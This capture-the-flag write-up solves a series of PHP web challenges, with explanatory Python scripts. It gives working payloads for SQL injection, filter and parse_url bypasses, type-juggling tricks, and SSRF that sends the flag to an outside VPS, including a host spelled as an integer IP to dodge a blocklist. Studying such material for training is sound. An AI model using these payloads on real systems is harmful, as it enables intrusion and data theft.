NEKO

solveme wp

2018/03/15

http://solveme.peng.kr/chall

WEB

Warm up

The string is base64; decode it, hex-encode the bytes, reverse the hex string and decode that again (Python 3):

import base64

s = '1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZgMWI4NTt3YWxmY='
raw = base64.b64decode(s)               # base64 -> bytes
print(bytes.fromhex(raw.hex()[::-1]))   # reverse the hex digits, then decode them

Bad compare

The hex encoding of the value being compared is visible in Burp Suite, so send exactly those bytes URL-encoded:

http://badcompare.solveme.peng.kr/index.php?answer=%f0%ee%c2%f5%d3%fa%e5%f1%d7%cc

Winter sleep

//wintersleep.solveme.peng.kr/index.php?time=5.185e6

Hard login

Request index.php, capture the request and replay it.
After a successful check the server redirects to index.php, but the page then bounces back to login.php, so just intercept the response in Burp and read it there.

URL filtering

//urlfiltering.solveme.peng.kr///index.php?do_you_want_flag=yes

A path starting with /// makes parse_url() return false.
Details: http://skysec.top/2017/12/15/parse-url%E5%87%BD%E6%95%B0%E5%B0%8F%E8%AE%B0/

Hash collision

//hashcollision.solveme.peng.kr/index.php?foo[]=1&bar[]=2

Passing an array to sha512() makes it return NULL, so the two results compare equal.

Array2String

http://array2string.solveme.peng.kr/index.php?value[]=305&value[]=309&value[]=372&value[]=360&value[]=351&value[]=328&value[]=353&value[]=355&value[]=363&value[]=361&value[]=366&value[]=359&value[]=323&value[]=353&value[]=365&value[]=368&password=simple_passw0rd

PHP's chr() reduces its argument modulo 256, so adding 256 to each character's ASCII code gives the same string after chr().
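Added example (mine, not the writeup's code): a payload generator for the chr() wrap-around trick. The challenge source is not on the page; the only facts used are that the server runs PHP's chr() over each value[] element and that chr() takes its argument modulo 256. The target string is what the writeup's values decode to once 256 is subtracted from each, and server_side_decode() is an assumed implode(array_map('chr', $value)) used only to confirm the round trip.

```python
from urllib.parse import urlencode

# Added example, not the writeup's code.  ENDPOINT and PASSWORD are taken
# from the request in the writeup; the server-side logic is assumed.
ENDPOINT = "http://array2string.solveme.peng.kr/index.php"
PASSWORD = "simple_passw0rd"


def php_chr(n):
    """Emulate PHP's chr(): the argument is reduced modulo 256 before lookup."""
    return chr(n % 256)


def encode_values(text, offset=256):
    """Shift every code point by a multiple of 256.  Any check done on the raw
    numbers before chr() sees e.g. 305, never 49 ('1'), yet chr(305) is '1'."""
    return [ord(c) + offset for c in text]


def server_side_decode(values):
    """Assumed server behaviour, implode(array_map('chr', $value)), used here
    to confirm that the shifted values still produce the intended string."""
    return "".join(php_chr(v) for v in values)


def build_payload(text, password=PASSWORD):
    """Build the value[]=...&password=... URL used in the writeup.
    safe='[]' keeps the PHP array brackets literal, as in the original request."""
    pairs = [("value[]", v) for v in encode_values(text)] + [("password", password)]
    return ENDPOINT + "?" + urlencode(pairs, safe="[]")


if __name__ == "__main__":
    target = "15th_HackingCamp"   # the writeup's value[] list minus 256 per element
    print(build_payload(target))
    assert server_side_decode(encode_values(target)) == target
```

Any offset that is a multiple of 256 works (512, 768, ...), which matters if a filter only blocks a specific numeric range rather than normalising the value first.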

Give me a link

Reference: http://myndtt.com/2017/10/22/url%E4%B8%AD%E7%9A%84%E4%B8%8B%E5%88%92%E7%BA%BF/

//givemealink.solveme.peng.kr/index.php?url=http://givemealink.solveme.peng.kr:1@vps/plz%1Agive%1Ame

The flag shows up in /var/log/apache2/access.log on the VPS.

Give me a link2

Reference: http://chaneyoon.tistory.com/365?category=727046
This one needs the IP-to-integer conversion: https://www.cnblogs.com/vovlie/archive/2012/10/17/2727029.html (in PHP: ip2long($ip)).
The check on $parse['host'] rejects localhost, any IP starting with 127 and any host containing a '.', so the host has to be written as the integer form of the IP followed by the port.

//givemealink2.solveme.peng.kr/index.php?url=http://<IP as an integer>:1234/plz%01give%01me

Listen on port 1234 on the VPS and the flag arrives there.
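Added example (mine, not the writeup's code) covering both Give me a link tricks: the userinfo trick from the first challenge and the integer-IP host from the second. 203.0.113.5 is a documentation address standing in for the VPS, and the two filter functions are my reconstruction of the checks the writeup describes, not the challenge source. urlsplit() stands in for PHP's parse_url(); both put whatever follows the last '@' in the host.

```python
import ipaddress
from urllib.parse import urlsplit

# Added example, not the writeup's code.  VPS_IP is a placeholder (RFC 5737
# documentation range); the filters are reconstructions, not challenge source.
CHALLENGE_HOST = "givemealink.solveme.peng.kr"
VPS_IP = "203.0.113.5"
VPS_PORT = 1234


def ip_to_int(ip):
    """Same value as PHP's ip2long(): the dotted quad packed into one 32-bit integer."""
    return int(ipaddress.IPv4Address(ip))


def userinfo_trick(expected_host, real_host, path):
    """Give me a link: the expected host sits in the userinfo (user:pass@) part,
    so a substring check on the URL is satisfied while the host is real_host."""
    return "http://%s:1@%s%s" % (expected_host, real_host, path)


def intip_trick(ip, port, path):
    """Give me a link2: the host written as an integer contains no '.', does not
    start with 127 and is not 'localhost', yet still resolves to the same machine."""
    return "http://%d:%d%s" % (ip_to_int(ip), port, path)


def link1_filter_passes(url):
    """Reconstructed check for the first challenge: the URL must mention the challenge host."""
    return CHALLENGE_HOST in url


def link2_filter_passes(url):
    """Reconstructed check on $parse['host'] for the second: no localhost, no 127.*, no dots."""
    host = urlsplit(url).hostname or ""
    return not (host == "localhost" or host.startswith("127") or "." in host)


def fetched_target(url):
    """Where the server-side request actually goes: (host, port) as the URL parser sees them."""
    parts = urlsplit(url)
    return parts.hostname, parts.port


if __name__ == "__main__":
    u1 = userinfo_trick(CHALLENGE_HOST, VPS_IP, "/plz%1Agive%1Ame")
    u2 = intip_trick(VPS_IP, VPS_PORT, "/plz%01give%01me")
    print(u1, link1_filter_passes(u1), fetched_target(u1))
    print(u2, link2_filter_passes(u2), fetched_target(u2))
```

The lesson for the defending side is the same in both cases: validate the parsed host (and resolve it) rather than string-matching the URL, and normalise integer, octal and hex IP spellings before comparing against a denylist.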

Hell JS

Clean up the JSFuck a bit (Python 3):

js = "..."   # the JSFuck payload, pasted verbatim

# Step 1: JSFuck atoms -> the character they evaluate to.
# Kept as an ordered list of (replacement, pattern) pairs: a dict silently drops
# duplicate keys, and Python 2 dicts iterated in arbitrary order, which made the
# substitutions order-dependent.
alpha_rules = [
    ('"f"', '(![]+[])[+[]]'),
    ('"i"', '([][[]]+[])[!![]+!![]+!![]+!![]+!![]]'),
    ('"l"', '(![]+[])[!![]+!![]]'),
    ('"t"', '(!![]+[])[+[]]'),
    ('"e"', '(!![]+[])[!![]+!![]+!![]]'),
    ('"r"', '(!![]+[])[+!![]]'),
    ('"c"', '({}+[])[!![]+!![]+!![]+!![]+!![]]'),
    ('"o"', '({}+[])[+!![]]'),
    ('"n"', '([][[]]+[])[+!![]]'),
    ('"s"', '(![]+[])[!![]+!![]+!![]]'),
    ('"u"', '(!![]+[])[!![]+!![]]'),
    ('" "', '({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]'),
    ('"b"', '({}+[])[!![]+!![]]'),
    ('"a"', '(![]+[])[+!![]]'),
    ('"2"', '(!![]+!![]+[])'),
    ('"4"', '(!![]+!![]+!![]+!![]+[])'),
    ('"7"', '(!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])'),
    ('"0"', '(+[]+[])'),
    ('"3"', '(!![]+!![]+!![]+[])'),
    ('"5"', '(!![]+!![]+!![]+!![]+!![]+[])'),
    ('"1"', '(+!![]+[])'),
    ('"9"', '(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])'),
    ('"8"', '(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])'),
    ('"6"', '(!![]+!![]+!![]+!![]+!![]+!![]+[])'),
    # "y" is (1e1000+[])[7], i.e. "Infinity"[7]; the "e" inside the number was
    # already rewritten by the rule above, so this pattern must run after it.
    ('"y"', '(+(+!![]+"e"+(+!![])+(+[])+(+[])+(+[]))+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]'),
    ('"d"', '([][[]]+[])[!![]+!![]]'),
    ('[3]', '[!![]+!![]+!![]]'),
]

for replacement, pattern in alpha_rules:
    js = js.replace(pattern, replacement)

# Step 2: glue the single-character strings back into names and numbers.
clean_rules = [
    ('"constructor"', '"c"+"o"+"n"+"s"+"t"+"r"+"u"+"c"+"t"+"o"+"r"'),
    ('"return "', '"r"+"e"+"t"+"u"+"r"+"n"+" "'),
    ('"filter"', '"f"+"i"+"l"+"t"+"e"+"r"'),
    ('"fontcolor"', '"f"+"o"+"n"+"t"+"c"+"o"+"l"+"o"+"r"'),
    ('"location"', '"l"+"o"+"c"+"a"+"t"+"i"+"o"+"n"'),
    # "p" is location[3] ("http"); its pattern uses the names rewritten just above.
    ('"p"', '([]["filter"]["constructor"]("return "+"location")()+[])[3]'),
    ('"110"', '"1"+"1"+"0"'),
    ('"111"', '"1"+"1"+"1"'),
    ('"99"', '"9"+"9"'),
    ('"98"', '"9"+"8"'),
    ('"57"', '"5"+"7"'),
    ('"101"', '"1"+"0"+"1"'),
    ('"108"', '"1"+"0"+"8"'),
    ('"106"', '"1"+"0"+"6"'),
    ('"61"', '"6"+"1"'),
    ('"112"', '"1"+"1"+"2"'),
    ('"116"', '"1"+"1"+"6"'),
    ('"40"', '"4"+"0"'),
    ('"34"', '"3"+"4"'),
    ('"119"', '"1"+"1"+"9"'),
    ('"105"', '"1"+"0"+"5"'),
    ('"102"', '"1"+"0"+"2"'),
    ('"125"', '"1"+"2"+"5"'),
    ('"97"', '"9"+"7"'),
    ('"100"', '"1"+"0"+"0"'),
    # ('"u"', '("1"["s"+"u"+"b"]())[!![]+!![]]'),
]

for replacement, pattern in clean_rules:
    js = js.replace(pattern, replacement)

print(js)

The script leaves this expression:
[]["filter"]["constructor"]([]["filter"]["constructor"]("return String")()["fromCharCode"]("4"+"7","4"+"7","3"+"2","1"+"0"+"3","111","111","100","3"+"2","106","111","98","3"+"3","1"+"0","1"+"0","108","101","116","3"+"2","102","108","97","1"+"0"+"3","3"+"2","61","3"+"2","112","1"+"1"+"4","111","1"+"0"+"9","112","116","40","34","119","1"+"0"+"4","97","116","3"+"2","105","1"+"1"+"5","3"+"2","116","1"+"0"+"4","101","3"+"2","102","108","97","1"+"0"+"3","6"+"3","34","4"+"1","5"+"9","1"+"0","1"+"0","105","102","3"+"2","40","102","108","97","1"+"0"+"3","3"+"2","61","61","61","3"+"2","34","34","4"+"1","3"+"2","1"+"2"+"3","1"+"0","1"+"0","9","97","108","101","1"+"1"+"4","116","40","34","112","108","1"+"2"+"2","3"+"2","105","1"+"1"+"0","112","1"+"1"+"7","116","34","4"+"1","5"+"9","1"+"0","1"+"0","125","3"+"2","101","108","1"+"1"+"5","101","3"+"2","105","102","3"+"2","40","102","108","97","1"+"0"+"3","3"+"2","61","61","61","3"+"2","34","102","108","97","1"+"0"+"3","1"+"2"+"3","5"+"0","4"+"9","100","102","5"+"2","97","100","5"+"1","99","101","5"+"1","4"+"9","97","102","5"+"6","5"+"2","5"+"3","99","102","57","99","100","5"+"4","97","5"+"3","101","100","100","98","98","57","4"+"9","125","34","4"+"1","3"+"2","1"+"2"+"3","1"+"0","1"+"0","9","97","108","101","1"+"1"+"4","116","40","34","98","105","1"+"1"+"0","1"+"0"+"3","111","34","4"+"1","5"+"9","1"+"0","1"+"0","125","3"+"2","101","108","1"+"1"+"5","101","3"+"2","1"+"2"+"3","1"+"0","1"+"0","9","97","108","101","1"+"1"+"4","116","40","34","119","1"+"1"+"4","111","1"+"1"+"0","1"+"0"+"3","34","4"+"1","5"+"9","1"+"0","1"+"0","125"))
Paste it into the browser console and run it.
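Added example (mine, not the writeup's): rather than handing the expression to Function() in a browser, decode the String.fromCharCode() argument list offline and read the source. EXPR is the expression above, copied verbatim from the writeup; the decoder evaluates the "4"+"7" style concatenations the way JavaScript would and then maps each number to a character.

```python
# Added example, not part of the original writeup.  EXPR is the expression
# the cleanup script produces, copied from the writeup.
EXPR = '[]["filter"]["constructor"]([]["filter"]["constructor"]("return String")()["fromCharCode"]("4"+"7","4"+"7","3"+"2","1"+"0"+"3","111","111","100","3"+"2","106","111","98","3"+"3","1"+"0","1"+"0","108","101","116","3"+"2","102","108","97","1"+"0"+"3","3"+"2","61","3"+"2","112","1"+"1"+"4","111","1"+"0"+"9","112","116","40","34","119","1"+"0"+"4","97","116","3"+"2","105","1"+"1"+"5","3"+"2","116","1"+"0"+"4","101","3"+"2","102","108","97","1"+"0"+"3","6"+"3","34","4"+"1","5"+"9","1"+"0","1"+"0","105","102","3"+"2","40","102","108","97","1"+"0"+"3","3"+"2","61","61","61","3"+"2","34","34","4"+"1","3"+"2","1"+"2"+"3","1"+"0","1"+"0","9","97","108","101","1"+"1"+"4","116","40","34","112","108","1"+"2"+"2","3"+"2","105","1"+"1"+"0","112","1"+"1"+"7","116","34","4"+"1","5"+"9","1"+"0","1"+"0","125","3"+"2","101","108","1"+"1"+"5","101","3"+"2","105","102","3"+"2","40","102","108","97","1"+"0"+"3","3"+"2","61","61","61","3"+"2","34","102","108","97","1"+"0"+"3","1"+"2"+"3","5"+"0","4"+"9","100","102","5"+"2","97","100","5"+"1","99","101","5"+"1","4"+"9","97","102","5"+"6","5"+"2","5"+"3","99","102","57","99","100","5"+"4","97","5"+"3","101","100","100","98","98","57","4"+"9","125","34","4"+"1","3"+"2","1"+"2"+"3","1"+"0","1"+"0","9","97","108","101","1"+"1"+"4","116","40","34","98","105","1"+"1"+"0","1"+"0"+"3","111","34","4"+"1","5"+"9","1"+"0","1"+"0","125","3"+"2","101","108","1"+"1"+"5","101","3"+"2","1"+"2"+"3","1"+"0","1"+"0","9","97","108","101","1"+"1"+"4","116","40","34","119","1"+"1"+"4","111","1"+"1"+"0","1"+"0"+"3","34","4"+"1","5"+"9","1"+"0","1"+"0","125"))'


def decode_from_char_code(expr):
    """Recover the source string passed to Function(): JS would first
    concatenate the quoted digits ("1"+"0"+"3" -> "103"), then
    String.fromCharCode() turns each number into one character."""
    marker = '["fromCharCode"]('
    start = expr.index(marker) + len(marker)
    args = expr[start:]
    # Two closing parens: one for fromCharCode(), one for the outer Function() call.
    if not args.endswith('))'):
        raise ValueError('expression does not end with "))"')
    args = args[:-2]
    codes = []
    for arg in args.split(','):
        digits = ''.join(part.strip().strip('"') for part in arg.split('+'))
        codes.append(int(digits))
    return ''.join(chr(c) for c in codes)


if __name__ == '__main__':
    print(decode_from_char_code(EXPR))
```

The decoded text is a plain prompt()/alert() comparison, so the expected value can be read straight out of it, and nothing untrusted ever runs.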

Replace filter

//replacefilter.solveme.peng.kr/index.php?say=%0agive_me_the_flag

A regex . does not match the newline (%0a), so the keyword after it is never seen by the filter.
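Added example (mine, not the challenge's code, which is not on the page): it assumes the filter is a preg-style pattern built on `.` and renders it in Python's re, which follows the same rule as PCRE here, `.` does not match `\n` unless DOTALL (PHP's /s modifier) is set. The hardened variant beside it avoids `.` entirely.

```python
import re

# Added example for the Replace filter trick.  The challenge's real pattern is
# not on the page; ^.*give_me_the_flag.*$ is an assumed shape that shows the
# failure mode.  Python's re and PCRE agree: '.' excludes '\n' by default.
BLOCKED = "give_me_the_flag"


def dot_filter_blocks(say, dotall=False):
    """True when the assumed pattern matches, i.e. the request would be blocked.
    With a leading newline the ^.* part cannot reach the keyword (re.match only
    tries position 0 and '.' stops at '\\n'), so the request slips through."""
    flags = re.DOTALL if dotall else 0
    return re.match(r"^.*" + re.escape(BLOCKED) + r".*$", say, flags) is not None


def substring_filter_blocks(say):
    """Hardened form: look for the keyword anywhere, with no '.' and no anchors,
    so line breaks cannot split the match."""
    return re.search(re.escape(BLOCKED), say) is not None


if __name__ == "__main__":
    payload = "\n" + BLOCKED          # the writeup's say=%0agive_me_the_flag
    print(dot_filter_blocks(payload))             # False: bypassed
    print(dot_filter_blocks(payload, dotall=True)) # True: /s fixes it
    print(substring_filter_blocks(payload))       # True
```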

anti sql

Reference: http://myndtt.com/2017/11/09/%E4%B8%80%E9%81%93anti%20sql/

http://antisqli.thinkout.rf.gd/?id=\&pw=union all select 31337,31337,31337--%02

The backslash is not filtered, so it escapes the closing quote of id and the pw value lands inside the query as SQL; -- followed by a URL-encoded control character acts as the comment (MySQL requires the second dash to be followed by whitespace or a control character).

namecheck

//namecheck.solveme.peng.kr/index.php?name=1','1') or min('1

Author: n3k0

Published: March 15th 2018, 12:14:52

Roar: no 魔夜2 to play, I'm dying
